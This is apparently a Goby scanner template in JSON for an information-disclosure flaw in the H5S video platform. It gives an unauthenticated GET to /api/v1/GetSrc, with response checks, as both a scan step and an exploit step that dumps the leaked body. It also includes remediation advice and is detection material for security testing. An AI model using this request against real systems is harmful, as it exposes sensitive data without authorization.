Goby/json/H5S_video_platform_GetSrc_i...

106 lines
4.1 KiB
JSON

{
"Name": "H5S video platform GetSrc information leakage",
"Level": "1",
"Tags": [
"infoleak"
],
"GobyQuery": "title=\"H5S视频平台|WEB\"",
"Description": "The system has a query information interface, which leaks a lot of sensitive information",
"Product": "H5S video platform",
"Homepage": "https://linkingvision.cn",
"Author": "gobysec@gmail.com",
"Impact": "<p>The system has a query information interface, which leaks a lot of sensitive information<br></p>",
"Recommendation": "<p>1. Strictly control the access permissions of the page and check the access permissions of the role. &nbsp;</p><p>2. You can use session to judge and control the user's identity.&nbsp;</p>",
"References": [
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-25919"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/v1/GetSrc",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "H5_CLOUD",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "H5_STREAM",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/v1/GetSrc",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "H5_CLOUD",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"PostTime": "2021-11-10 09:56:59",
"GobyVersion": "1.9.304"
}